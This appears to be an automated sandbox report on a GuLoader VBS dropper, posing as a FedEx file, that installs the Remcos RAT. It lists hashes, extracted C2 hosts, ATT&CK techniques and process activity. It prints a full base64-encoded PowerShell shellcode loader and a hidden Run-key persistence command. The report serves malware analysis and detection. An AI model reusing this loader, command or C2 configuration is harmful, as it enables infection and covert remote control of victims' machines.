guloader | 19469f11cba8ab55b84cf26efa8835e906d07fdb73572c9ee3594e5c44c798bf

General

Target

775578748333_FEDEX.vbs
Size

75KB
MD5

5d3ad82ef16521df753bc6baff37f72f
SHA1

ac4df3a47570b88a4768c2c461b15f78b99753dd
SHA256

19469f11cba8ab55b84cf26efa8835e906d07fdb73572c9ee3594e5c44c798bf
SHA512

3e83cadcfdd061c49dc09c4cbedb99d6fa3eade1d83e7e549406c7631955a02fced9e3eba61d6d8ffc056cb0429ced5ca21c2976871b64f8c5d778ff9a5e1790

Score

10^/10

guloader remcos as-new downloader persistence rat

Malware Config

Extracted

Family

remcos

Version

3.3.2 Pro

Botnet

AS-NEW

C2

rnnfibi.hopto.org:54666

rnnfibiteammony.duckdns.org:54666

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
bguy.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
keylog_path
%AppData%
mouse_option
false
mutex
Remcos-IXYB2Q
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
iusk-dikf-iud
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
notepad;solitaire;

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\opklbedebi = "cmd /c start /b c:\\windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)"	ieinstal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ieinstal.exe

pid process

924 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1256 powershell.exe
924 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1256 set thread context of 924 1256 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1256 powershell.exe
924 ieinstal.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1256 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1256 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ieinstal.exe

pid process

924 ieinstal.exe

pid	process
924	ieinstal.exe

pid	process
1256	powershell.exe
924	ieinstal.exe

description	pid	process	target process
PID 1256 set thread context of 924	1256	powershell.exe	ieinstal.exe

pid	process
1256	powershell.exe
924	ieinstal.exe

pid	process
1256	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1256	powershell.exe

pid	process
924	ieinstal.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

WScript.exepowershell.execsc.exeieinstal.exe

description	pid	process	target process
PID 980 wrote to memory of 1256	980	WScript.exe	powershell.exe
PID 980 wrote to memory of 1256	980	WScript.exe	powershell.exe
PID 980 wrote to memory of 1256	980	WScript.exe	powershell.exe
PID 980 wrote to memory of 1256	980	WScript.exe	powershell.exe
PID 1256 wrote to memory of 1076	1256	powershell.exe	csc.exe
PID 1256 wrote to memory of 1076	1256	powershell.exe	csc.exe
PID 1256 wrote to memory of 1076	1256	powershell.exe	csc.exe
PID 1256 wrote to memory of 1076	1256	powershell.exe	csc.exe
PID 1076 wrote to memory of 1156	1076	csc.exe	cvtres.exe
PID 1076 wrote to memory of 1156	1076	csc.exe	cvtres.exe
PID 1076 wrote to memory of 1156	1076	csc.exe	cvtres.exe
PID 1076 wrote to memory of 1156	1076	csc.exe	cvtres.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 1256 wrote to memory of 924	1256	powershell.exe	ieinstal.exe
PID 924 wrote to memory of 1712	924	ieinstal.exe	iexplore.exe
PID 924 wrote to memory of 1712	924	ieinstal.exe	iexplore.exe
PID 924 wrote to memory of 1712	924	ieinstal.exe	iexplore.exe
PID 924 wrote to memory of 1712	924	ieinstal.exe	iexplore.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\775578748333_FEDEX.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4AaQBzAG0AbQAgAE8AcABkAHIAaQBmAHQAcwAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAaQBuAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAGEAYQBuAGQAYgBvAGwAZABoADYAIgAgAA0ACgAkAFMAYwByAGkAcAB0AGUAcgBlADMAPQAwADsADQAKACQAUwBjAHIAaQBwAHQAZQByAGUAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABTAGMAcgBpAHAAdABlAHIAZQA4AD0AWwBTAGMAcgBpAHAAdABlAHIAZQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAYwByAGkAcAB0AGUAcgBlADMALAAwACwAWwByAGUAZgBdACQAUwBjAHIAaQBwAHQAZQByAGUAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAE8AYgBsAGkAZwBhAHQAIABPAHAAcwBrAHIAZQByAGYAcgBzACAARABlAHMAbwByADYAIABHAFIAVQBQAFAARQBNAEUARAAgAEwASQBWAFMASwBWAEEAIABzAHQAZQByAHMAcwB0ACAAQQBjAHQAaQBvAG4AYQByADYAIABBAG4AYQByAHQAaAByAG8AMQAgAFcAYQBtAHAAYQBuAG8AYQBnAG0ANwAgAFIAZQBnAG4AdgBlAGoAcgA3ACAAawBvAGUAYgB0AGYAdQByAHoAZQAgAEMAbwByAG4AbABlAHMAcwAzACAAQgByAHkAZwBoAHUAcwBlAGEAIABOAGkAZwBoAHQAaQBtAGUAIABiAGEAYQBsAHQAYQAgAGMAeQBjAGwAbwAgAFMAaQBuAGQAcwAzACAAUABMAEEARABFAEwAQQBHAEUAIABTAGsAaQBuAG4AZQBiAGUANgAgAFoAdwBlAGMAawBzAGMAbwBwADkAIAB0AGUAdQB0AG8AbgBpAHoAIABBAHMAcwBlAHMAcwBvAHIAZQAgAHIAZQBuAGEAcwAgAFYARQBBAEwAIABQAFIAUwBJAEQAIABCAG8AdgBiAGwAIABBAFMAWQBNACAATQBJAFIATwBTAEwASQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBwAGkAbgAiACAADQAKACQAUwBjAHIAaQBwAHQAZQByAGUAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwARwByAHUAbgBkAC4AZABhAHQAIgANAAoAIwBHAGUAbgBiAHIAdQBnAHMANwAgAHAAaAB5AHQAIABjAG8AcAByAGkAIABkAGUAbQBvAG4AcwB0AHIAYQAgAE0AZQB0AGgAeQBsAHAAIABTAG8AYwBpAGEAbAAxACAAcwB0AGEAbABsAGkAbgBnACAAZABvAGMAawB3ACAAdQBuAGIAZQAgAEIAYQBsAGwAYQBzACAAVgBhAG4AZAB1AGQAcwBrAGkAIABEAG8AbQBzACAAVgBlAGwAcwBlAHMAbwB2AGUAcgAgAHAAcgBvAGwAbwBjAHUAdABvAHIAIABUAEkARABTAEsAIABKAHUAcgBpAHMAdAAgAFQAaQBsAHMAaQBrAHIAZQB0AHIAIABzAHAAYQByAGsAZQBuAGUAbQBhACAAYgBlAHMAdAByAG4AaQBuAGcAIABTAFQAWQBSAEkATgBHAFMAQQAgAEIAbwBsAHQAZQBkAGUAIABCAE8ARABZAEcAIABEAEUAUwBVAEwAIABQAG8AcwB0AGEAdQByAGkAYwB1ACAAVAByAHkAawBuADQAIABJAE4ARABJAFYASQBEAFUAQQAgAFAASQBOAEMARQBUAFQAIAANAAoAJABTAGMAcgBpAHAAdABlAHIAZQA0AD0AWwBTAGMAcgBpAHAAdABlAHIAZQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAUwBjAHIAaQBwAHQAZQByAGUAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBTAHUAbQBwAHQAdQBvAHUAcwAgAE0ATwBEAEUAUgBFAFIARQBSACAARAByAHkAcwAgAEgAQQBMAFMAQgBSACAAbABlAGQAaQBnACAARgBsAGEAZwBlAHIAbQB1AHMAZQAgAEUARgBUAEUAUgAgAFMASwBKAE8AUgBUACAARgBsAGkAbgA5ACAAQgBlAG4AZQBmAGkAYwBlAG4AIABmAG8AcgBtACAARQBtAGIAcgBlAGEAYwBoAHMAdAAyACAAZAByAGUAagBuAGkAbgBnAHMAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAagByAGUAIgAgAA0ACgAkAFMAYwByAGkAcAB0AGUAcgBlADUAPQAwADsADQAKACMAbQBlAG4AcwB0AHIAdQBhAHQAZQAgAEEAZgBwAHIAdgBuAGkAbgBnAHMAMgAgAEwAdQBjAGkAbgBkADUAIABwAGUAdAByAGkAcwBhACAARwBlAG8AcABoAGEAZwBpAHMAIABQAGgAaQBsACAAQwB1AHQAdABsAGUANQAgAEEAawBrAG8AIABTAHQAYQBtADMAIABTAEwASQBCAEIARQBSAFMAQQBVACAAVgBlAHIAZABlAG4AcwA0ACAAUwBPAEwASQBEAEEAUgAgAEsAQQBSAFQAQQBVAEQASQBUAFIAIABNAE8AVQBSACAAYwBvAGMAawBzAHAAYQByACAAUwB0AGoAZQByAG4AZQBkADMAIABHAGUAbgBuAGUAbQA0ACAAYgBvAHIAdABrAGEAbABkACAAcwBkAGUAdABzAGkAbABrAGUAcwAgAHIAaQBnAG8AcgBpAHMAIABiAGEAbABkAHAAYQB0ACAASABWAEEATABGAEEATgBHACAAUwBhAHQAaQBuAGkAcwBlAHMAZwAgAGEAbgB0AGkAYwBsAGkAbQBhACAAbwB1AHQAcwB0AHIAaQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARAB1AGIAbABhAG4AdABzAGYAMwAiACAADQAKAFsAUwBjAHIAaQBwAHQAZQByAGUAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAFMAYwByAGkAcAB0AGUAcgBlADQALAAkAFMAYwByAGkAcAB0AGUAcgBlADMALAAyADYAMQAyADUALABbAHIAZQBmAF0AJABTAGMAcgBpAHAAdABlAHIAZQA1ACwAMAApAA0ACgAjAFAATwBVAEwAVABSAFkAIABBAHIAZQBuAHAAaABvAHQAbwBsADMAIABQAGEAcgBnACAAUgBlAGcAZQBsADUAIABMAGkAbgBpAHIAdQBuAGEAcwBoACAAVABvAHAAZgAzACAAZABpAGEAbABlAGsAdABpAGsAIABSAGUAcAByAG8AdgBhAGIAOAAgAEcAZQBhAHIAdgBsAGcAZQByAHMAIABVAEQARQBOAEUAVQBSAE8AUAAgAEMAQQBNAEIAVQBDAEEAUwBXACAAZgByAGEAZABtAG0AdABlAHcAZQAgAEYAYQByAHMAaQB1AG4AIABqAGUAcgBuAGIAYQBuAGUAbABpACAATABVAFYAUwBJAEcAQQBOAEcAIABBAGYAZABlAGwAaQBuACAAVABhAGIAZQBsAGwAZQAzACAAUAB1AHIAdgBpAGUAdwAzACAAUABsAGEAYwBlAGgAbwBsACAAYQByAHYAZQAgAFAAcgBpAGEAcAB1AGwAIABSAE8AUwBBAFUAUgAgAGQAaQBzAGMAIABTAFYAQQBSAEwAIABpAG4AZAB1AHMAIABTAE8AVQBCAEkAUwBFAFMAVAAgAHMAYwBoAG8AbwBsAHQAIABMAFIARQBSAEYATABVAEcAIABBAGcAcgBhAGYAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEkAbQBiAGEAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHIAZQBpAG0AcABsAGkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQQBmAG0AbgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAE8ATgBEAE4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARABpAHMAcgBpACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFcAYQB5AGIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARwBBAFMAVABSAE8AQwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAGUAZABkAGUAbAA3ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbABkAHMAcABpAG4AMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAEMAQwBMACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbgBpAHYAZQByAHMAYQAyACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMATwBFAEIATwBSACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE0AeQBvAHMAaQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAHUAawBzAHMAdABhAGMAIgAgAA0ACgBbAFMAYwByAGkAcAB0AGUAcgBlADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAFMAYwByAGkAcAB0AGUAcgBlADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA=="
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xow_gk4i.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CB3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3CA3.tmp"
4⤵
PID:1156

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:924

\??\c:\program files\internet explorer\iexplore.exe
"c:\program files\internet explorer\iexplore.exe"
4⤵
PID:1712

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Grund.dat
MD5
2ec027f5af868cca83ad50c2e2604925

SHA1
61ea6d742efe598567175352e6d39e7949ce3cdc

SHA256
eccf8bd7acafe87be6fc4f5ae205d55475c631064c307b5bfcf4fffed570299a

SHA512
70d1b60bc9b57cfd1257c5e993ffb51c165ccd20b620a6fcf3eadc431c446af06423555c36be113754acd08a4b9e940858c7804a84ce61d23e2cfaf3e1b852bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3CB3.tmp
MD5
50756b99c8f804b0283ed12327260d81

SHA1
4e12820dcad09b9ddd3d70045ff5d2c0e47c77f4

SHA256
c014d8e0e201430418510e3a2b802ce8d55ecc19d6bdc158648ae9250ad0ad44

SHA512
a0172bf675f2c5a4943b46079967693ef8149c56e5f1be83f1c9c61d5deb0f458caee80e4f116ce29f74d05dc17c4b6d65d193a08c35a52b6d79eece753ae220

Download Submit
C:\Users\Admin\AppData\Local\Temp\xow_gk4i.dll
MD5
fba5cefe5ac8b2a56ad9f370fd9fd87b

SHA1
dd935f12d65bb3f911cee44a3d3c92a121d52299

SHA256
3af1cbecd8b1e361adc85aa512872753256d2062832d774234a55950f5a1e7ca

SHA512
ba89aadfe715df1144723687d3003bcd7096ee85fa8538ebc0031b7698ae45b4ec9ce8345740e337bf582af65ac3dde992837757e5898173cf559ed2e45afed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\xow_gk4i.pdb
MD5
5ee0554896ab35f5f5aee4e5f0ce8981

SHA1
40f68187827fa07867d1565d90138a896ff8fc74

SHA256
18b8643163f9f043d7a41cb97de218bcb5fa377280529d6055c900ae97c2f626

SHA512
46079114de3715e472f1315e3e2efaacb4e53ed324eab409525e7094f4d70901e9ccf16941056698e05ee9505109d31123677100d1fa801c01ac7671a72541be

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3CA3.tmp
MD5
f48b07eda51b344e08fc99c5d3673039

SHA1
842cdb53c43abe1c9584747e8dcebb93bc4febd3

SHA256
0224c4fde03ec69f81d874ba634953de97c2323d3d8298677ced1af6ba33438a

SHA512
6bb994e05661513d1dfb46c09598fa7893ec09cedfdc3257b9671a8c04e62ed1960a539894d884b52333ba555548ea96f6b2995a62b892bca88c5727485ec9cd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xow_gk4i.0.cs
MD5
6314facbe2f665388a6b8f4b896dc466

SHA1
e2c28d0a6f2296f48c3cfb1e446cd6691bf1c252

SHA256
cd7e99d32cb2b1d17db5aa28cab64bf5a54562c1d3b46c2e19c07b924da350af

SHA512
f326a1eecd0e0f418607e688bd8466a65062e1615f5d8b82bf80a5474b10269ba95f465c3e6d6e78de11dd7b17bf7d0441542fbe545e54dab167544b620abab8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xow_gk4i.cmdline
MD5
9807c0f9f7728efcd3b67d6390caeee0

SHA1
b3cc2afbb5938f9432abab6cfce890538cda0d93

SHA256
e28a4e08a70efb37eac11e50f64d2f849e3298b7c8b5bcc43a25bb123a42d91f

SHA512
f76b109526b5ca72adc916186c5e26e4c4c07d1c4e78a954088fb391ce19de4f227c99510770f1296da909e57aec10ae4540851841e266a968e5b16175433066

Download Submit
memory/924-80-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/924-79-0x0000000000400000-0x000000000069B000-memory.dmp

Filesize
2.6MB

Download
memory/924-78-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/924-72-0x00000000000D0000-0x00000000001D0000-memory.dmp

Filesize
1024KB

Download
memory/980-54-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

Filesize
8KB

Download
memory/1076-63-0x0000000000470000-0x0000000000471000-memory.dmp

Filesize
4KB

Download
memory/1256-69-0x0000000004E90000-0x0000000004F90000-memory.dmp

Filesize
1024KB

Download
memory/1256-55-0x00000000751B1000-0x00000000751B3000-memory.dmp

Filesize
8KB

Download
memory/1256-73-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/1256-74-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/1256-58-0x0000000002410000-0x000000000305A000-memory.dmp

Filesize
12.3MB

Download
memory/1256-59-0x0000000002410000-0x000000000305A000-memory.dmp

Filesize
12.3MB

Download
memory/1256-60-0x0000000002410000-0x000000000305A000-memory.dmp

Filesize
12.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads